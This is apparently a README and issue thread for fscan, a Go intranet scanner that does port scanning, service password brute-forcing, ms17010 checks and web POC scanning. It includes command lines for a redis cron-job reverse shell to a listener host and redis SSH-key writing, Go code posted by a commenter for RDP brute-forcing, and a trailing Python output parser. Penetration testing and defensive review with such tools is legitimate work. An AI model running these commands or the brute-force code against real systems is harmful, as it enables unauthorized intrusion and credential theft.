fscan

Introduction

A comprehensive intranet scanning tool for convenient one-click, automated, all-round vulnerability scanning.
Supports host liveness detection, port scanning, brute-forcing of common services, ms17010, batch writing of public keys to redis, reverse shell via cron job, reading Windows NIC information, web fingerprinting, web vulnerability scanning and more.

Main features

1. Information gathering:

  • Liveness detection (icmp)
  • Port scanning

2. Brute-force:

  • Brute-force of various services (ssh, smb, etc.)
  • Database password brute-force (mysql, mssql, redis, psql, etc.)

3. System information and vulnerability scanning:

  • Get target NIC information
  • High-risk vulnerability scanning (ms17010, etc.)

4. Web detection:

  • webtitle detection
  • Web fingerprinting (common CMS, OA frameworks, etc.)
  • Web vulnerability scanning (weblogic, st2, etc.; supports xray POCs)

5. Exploitation:

  • Write public key or cron job to redis
  • ssh command execution

6. Other:

  • Save results to file

Usage

Simple usage

fscan.exe -h 192.168.1.1/24  (all modules are used by default)
fscan.exe -h 192.168.1.1/16  (scan a /16)

Other usage

fscan.exe -h 192.168.1.1/24 -np -no -nopoc (skip liveness check, do not save to file, skip web poc scan)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis: write public key)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis: cron-job reverse shell)
fscan.exe -h 192.168.1.1/24 -c whoami (run a command after a successful ssh brute-force)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (specify module ssh and port)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (load usernames and passwords from the given files for brute-forcing)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (path for saving results; defaults to the current directory)
fscan.exe -h 192.168.1.1/8  (for a /8, only 192.x.x.1 and 192.x.x.254 of each subnet are scanned, for a quick overview of the network)
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (try a single password against smb)
fscan.exe -h 192.168.1.1/24 -m ms17010 (specify a module)
fscan.exe -hf ip.txt  (import targets from a file)

Build command

go build -ldflags="-s -w " -trimpath

Full parameters

  -Num int
        poc rate (default 20)
  -c string
        exec command (ssh)
  -cookie string
        set poc cookie
  -debug
        debug mode will print more error info
  -domain string
        smb domain
  -h string
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
        host file, -hs ip.txt
  -m string
        Select scan type ,as: -m ssh (default "all")
  -no
        not to save output log
  -nopoc
        not to scan web vul
  -np
        not to ping
  -o string
        Outputfile (default "result.txt")
  -p string
        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")
  -ping
        using ping replace icmp
  -pocname string
        use the pocs these contain pocname, -pocname weblogic
  -proxy string
        set poc proxy, -proxy http://127.0.0.1:8080
  -pwd string
        password
  -pwdf string
        password file
  -rf string
        redis file to write sshkey file (as: -rf id_rsa.pub)
  -rs string
        redis shell to write cron file (as: -rs 192.168.1.1:6666)
  -t int
        Thread nums (default 600)
  -time int
        Set timeout (default 3)
  -u string
        url
  -uf string
        urlfile
  -user string
        username
  -userf string
        username file
  -wt int
        Set web timeout (default 5)

Screenshots

fscan.exe -h 192.168.x.x (all modules, ms17010, reading NIC information)

fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis: write public key)

fscan.exe -h 192.168.x.x -c "whoami;id" (ssh command)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 (one-click support for xray POCs)

Reference links

https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc

Recent updates

[+] 2021/3/4 Support -u url or -uf url.txt for batch scanning of URLs
[+] 2021/2/25 Reworked the yaml parsing module to support password brute-forcing, e.g. tomcat weak passwords. Added a sets parameter (array type) to the yaml for holding passwords; see tomcat-manager-week.yaml
[+] 2021/2/8 Added fingerprinting; recognises common CMS and frameworks such as Seeyon OA (致远OA) and Tongda OA (通达OA).
[+] 2021/2/5 Changed the icmp sending mode, better suited to large-scale probing.
Changed error reporting: with -debug, if there is no new progress within 10 seconds, the current progress is printed every 10 seconds
[+] 2020/12/12 Added a yaml parsing engine that supports xray POCs; all POCs are used by default (xray's POCs have been filtered), or use -pocname weblogic to run only one kind or one specific POC. Requires go 1.16 or above; you must build the latest go yourself to test it
[+] 2020/12/6 Optimised the icmp module; added the -domain parameter (for the smb brute-force module, for domain users)
[+] 2020/12/03 Optimised the IP range handling, icmp and port scanning modules. Added support for 192.168.1.1-192.168.255.255.
[+] 2020/11/17 Added the -ping parameter: the liveness module uses ping instead of icmp packets.
[+] 2020/11/17 Added the WebScan module with simple shiro detection. Certificate verification is skipped on https. Separated the service-module and web-module timeouts; added the -wt parameter (WebTimeout).
[+] 2020/11/16 Optimised the icmp module; added the -it parameter (IcmpThreads), default 11000, suitable for /16 scans
[+] 2020/11/15 Support importing IPs from a file, -hs ip.txt, with deduplication

Comments
  • Build error

    D:\Code\Golang\fscan>go build -ldflags="-s -w " -trimpath

    runtime/cgo

    cgo: C compiler "gcc" not found: exec: "gcc": executable file not found in %PATH%

    This problem appeared after downloading the version following yesterday's go.mod update; the version from 3 days ago compiled fine.

  • Build failure

    Master, I downloaded the git source directly and the build failed. go run main.go -h reports: go: updates to go.mod needed; to update it: go mod tidy. I then ran go mod tidy, and building again reports:

    github.com/shadow1ng/fscan/Plugins

    Plugins/base.go:54:14: undefined: aes
    Plugins/base.go:60:15: undefined: cipher
    Plugins/base.go:65:9: undefined: base64
    Plugins/base.go:69:19: undefined: base64
    Plugins/base.go:72:14: undefined: aes
    Plugins/base.go:76:15: undefined: cipher
    Plugins/base.go:90:13: undefined: bytes

  • poc-yaml-thinkadmin-v6-readfile environment creation error: unsupported type: *lib.UrlType

    Master, I modified the code according to your update, but got these errors. Do you know how to fix them? The errors are:

    [-] poc-yaml-metinfo-cve-2019-17418-sqli environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-minio-default-password environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-metinfo-lfi-cnvd-2018-13393 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-apache-httpd-cve-2021-40438-ssrf environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-apache-httpd-cve-2021-41773-rce environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-apache-httpd-cve-2021-41773-path-traversal environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-laravel-debug-info-leak environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-laravel-improper-webdir environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nextjs-cve-2017-16877 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-msvod-sqli environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-myucms-lfr environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nagio-cve-2018-10735 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nagio-cve-2018-10738 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-natshell-arbitrary-file-read environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-netentsec-icg-default-password environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-netentsec-ngfw-rce environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-netgear-cve-2017-5521 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-maccms-rce environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nagio-cve-2018-10737 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-bash-cve-2014-6271 environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-airflow-unauth environment creation error: unsupported type: *lib.UrlType
    [-] poc-yaml-nagio-cve-2018-10736 environment creation error: unsupported type: *lib.UrlType
    ……

  • Suggest adding RDP brute-force

    Referring to https://github.com/tomatome/grdp/ it is easy to implement; the code is too ugly so I won't post it properly, just a suggestion for the master

    package Plugins

    import (
    	"fmt"
    	"strconv"
    	"strings"
    	"time"

    	"github.com/shadow1ng/fscan/common"
    	"github.com/tomatome/grdp"
    )

    // RdpScan tries each user/password pair of the rdp dictionary against one host.
    func RdpScan(info *common.HostInfo) (tmperr error) {
    	if common.IsBrute {
    		return
    	}
    	// HostInfo carries the port as a string; fail early if it is not numeric
    	// instead of silently discarding the conversion error.
    	port, err := strconv.Atoi(info.Ports)
    	if err != nil {
    		return err
    	}
    	starttime := time.Now().Unix()
    	for _, user := range common.Userdict["rdp"] {
    		for _, pass := range common.Passwords {
    			pass = strings.Replace(pass, "{user}", user, -1)
    			flag, err := RdpConn(info.Host, info.Domain, user, pass, port)
    			if flag && err == nil {
    				result := fmt.Sprintf("[+] RDP:%v:%v:%v %v", info.Host, info.Ports, user, pass)
    				common.LogSuccess(result)
    				return err
    			}
    			errlog := fmt.Sprintf("[-] rdp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
    			common.LogError(errlog)
    			tmperr = err
    			if common.CheckErrs(err) {
    				return err
    			}
    			// Give up once the whole dictionary has exceeded its time budget.
    			if time.Now().Unix()-starttime > (int64(len(common.Userdict["rdp"])*len(common.Passwords)) * info.Timeout) {
    				return err
    			}
    		}
    	}
    	return tmperr
    }

    // RdpConn performs a single RDP login attempt via grdp.
    func RdpConn(ip, domain, login, password string, port int) (bool, error) {
    	target := fmt.Sprintf("%s:%d", ip, port)
    	err := grdp.Login(target, domain, login, password)
    	if err != nil {
    		return false, err
    	}
    	return true, nil
    }
    
  • Some suggestions from a friend of mine

    A: What did you say was wrong with the latest fscan?

    XXXXXX: Still garbled characters

    A: Anything else?

    XXXXXX: I mean the garbled characters in result.txt

    A: [image]

    A: He only handles these three encodings; ISO is also very common and isn't included

    XXXXXX: I see, I'll open an issue for him

    A: Faster to fix it yourself

    A: [image]

    A: Except for 443, everything else is accessed over http; no wonder things get missed

    XXXXXX: Keep filing issues

    XXXXXX: Tell him to try both

    A: Let me finish reading first; there's a function later that seems to recognise https, and some other handling too

    A: It really does only recognise port 443. Also, 302 redirects are followed only once; yesterday several sites I brute-forced redirected three times, although on first login there is usually only one redirect

    XXXXXX: Open an issue for him

    A: You do it

    A: I'm not a freeloader

  • BUG with -np (ping disabled)

    Environment: MAC (works fine on windows)

    Thanks for your hard work, author

    Normal case:

    go run main.go -h 172.20.10.1/24
    
    (Ping) Target '172.20.10.15' is alive
    (Ping) Target '172.20.10.1' is alive
    (Ping) Target '172.20.10.3' is alive
    icmp alive hosts len is: 3
    172.20.10.1:21 open
    

    Scanning with -np causes errors and the scan cannot finish on its own.

    go run main.go -h 172.20.10.1/24 -np
    
    172.20.10.63:21 open
    172.20.10.29:21 open
    172.20.10.62:21 open
    open result.txt: too many open files
    open result.txt: too many open files
    172.20.10.64:21 open
    open result.txt: too many open files
    172.20.10.54:21 open
    open result.txt: too many open files
    ...
    
  • Hi bro, getting the errors undefined: MS17010EXP and not enough arguments in call to

    PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go env -w GOPROXY=https://goproxy.cn,direct
    PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go mod tidy
    PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go build -ldflags="-s -w " -trimpath

    github.com/shadow1ng/fscan/Plugins

    Plugins\ms17010.go:133:4: undefined: MS17010EXP
    Plugins\scanner.go:16:28: not enough arguments in call to "github.com/shadow1ng/fscan/common".ParseIP have (string, string) want (string, string, string)

  • With version 1.5.1, ssh and smb brute-force have problems

    I am currently doing an internal security review of a /16 at my company and found that with the updated version the SSH and SMB brute-force results seem to be empty. The default is 600 threads; for accuracy we set the threads to 100 and still do not get the expected results. The account and password (which are confirmed to be correct) are given via parameters; the command is: ./fscan_amd64_upx -h 10.x.0.1/16 -user xxx -pwd xxx -t 100

  • Feature request: add extra usernames and passwords in dictionary form

    Roughly like this: there are the userf and pwdf parameters, which add usernames and passwords as dictionaries. But if you do that, only the user-supplied dictionaries are used, and I find the default dictionaries shipped with Fscan very useful.

    If instead you use usera and pwda, the parameters for adding extra usernames and passwords, it seems you can only specify one? And when I tried, they don't seem to support importing a txt dictionary, so if I want to add several usernames or passwords on top of Fscan's built-in dictionaries it becomes very cumbersome.

    So I hope the author can strengthen usera and pwda so they support dictionary import, or add new parameters such as useraf and pwdaf.

  • MAC OS Ventura 13.0.1 crashes with "segmentation fault"

    ~/Desktop
    ❯ file fscan_darwin
    fscan_darwin: Mach-O 64-bit executable x86_64
    
    ~/Desktop
    ❯ md5 ./fscan_darwin
    MD5 (./fscan_darwin) = 702fc712074669bdae02e1092bcac785
    
    ~/Desktop
    ❯ ./fscan_darwin -h
    [1]    7075 segmentation fault  ./fscan_darwin -h
    
    

    Processor: Intel Core

  • linux error

    ./fscan1
    ./fscan1: line 1: !DOCTYPE: No such file or directory
    ./fscan1: line 2: syntax error near unexpected token newline'
    ./fscan1: line 2: "http://www.w3.org/TR/html4/strict.dtd">'

  • Problem with mysql brute-force using a password file

    Using the command fscan64.exe -h 192.168.2.128 -m mysql -p 38080 -pwdf top100password.txt -userf top10W.txt, the result is:

    [*] Icmp alive hosts len is: 1
    192.168.2.128:38080 open
    [*] alive ports len is: 1
    start vulscan
    [+] mysql:192.168.2.128:38080:test test
    已完成 1/1
    [*] 扫描结束,耗时: 440.2911ms

    It only used the first line of top100password.txt and top10W.txt (username + password), then reported the scan as finished with this result, which is wrong. The same happens in several environments; mysql version is 5.7
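The scan output quoted in the issue reports above uses a few fixed line shapes. As an added example that is not part of fscan or the original page, this Python script parses such output into per-host findings for triage and counts the failed result-file writes from the -np bug so a truncated run is not mistaken for a clean one; the sample input is constructed, and the line shapes are assumed from the reports on this page.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
# Line shapes copied from the scan output quoted in the issue reports (assumed stable).
_ALIVE = re.compile(r"^\(Ping\) Target '(?P<host>[\d.]+)' is alive$")
_OPEN = re.compile(r"^(?P<host>[\d.]+):(?P<port>\d+) open$")
_CRED = re.compile(r"^\[\+\] (?P<svc>\w+):(?P<host>[\d.]+):(?P<port>\d+):(?P<user>\S+) (?P<pw>\S*)$")
_FILE_ERR = re.compile(r"^open \S+: too many open files$")
# Constructed sample, shaped like the output quoted in the issues above (one line repeated).
SAMPLE = """\
(Ping) Target '172.20.10.15' is alive
(Ping) Target '172.20.10.1' is alive
172.20.10.1:21 open
172.20.10.1:21 open
192.168.2.128:38080 open
open result.txt: too many open files
[*] alive ports len is: 2
[+] mysql:192.168.2.128:38080:test test
[+] RDP:172.20.10.1:3389:admin admin
"""
@dataclass(frozen=True)
class Finding:
    kind: str          # "alive", "open_port" or "weak_cred"
    host: str
    port: int = 0
    detail: str = ""   # "<service> <user>:<password>" for weak_cred

def parse_line(line: str):
    """One output line -> Finding; counters, banners and other noise give None."""
    line = line.strip()
    if m := _ALIVE.match(line):
        return Finding("alive", m["host"])
    if m := _OPEN.match(line):
        return Finding("open_port", m["host"], int(m["port"]))
    if m := _CRED.match(line):
        return Finding("weak_cred", m["host"], int(m["port"]), f"{m['svc'].lower()} {m['user']}:{m['pw']}")
    return None
def parse_output(text: str) -> dict:
    """Unique findings per host, a count of failed result.txt writes (the -np bug above),
    and the hosts with a weak credential, which go to the top of the triage list."""
    hosts, write_errors = defaultdict(list), 0
    for raw in text.splitlines():
        if _FILE_ERR.match(raw.strip()):
            write_errors += 1      # output after this point may be incomplete
            continue
        f = parse_line(raw)
        if f is not None and f not in hosts[f.host]:   # the scanner can repeat lines
            hosts[f.host].append(f)
    fix_first = sorted(h for h, fs in hosts.items() if any(f.kind == "weak_cred" for f in fs))
    return {"hosts": dict(hosts), "write_errors": write_errors, "fix_first": fix_first}
```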
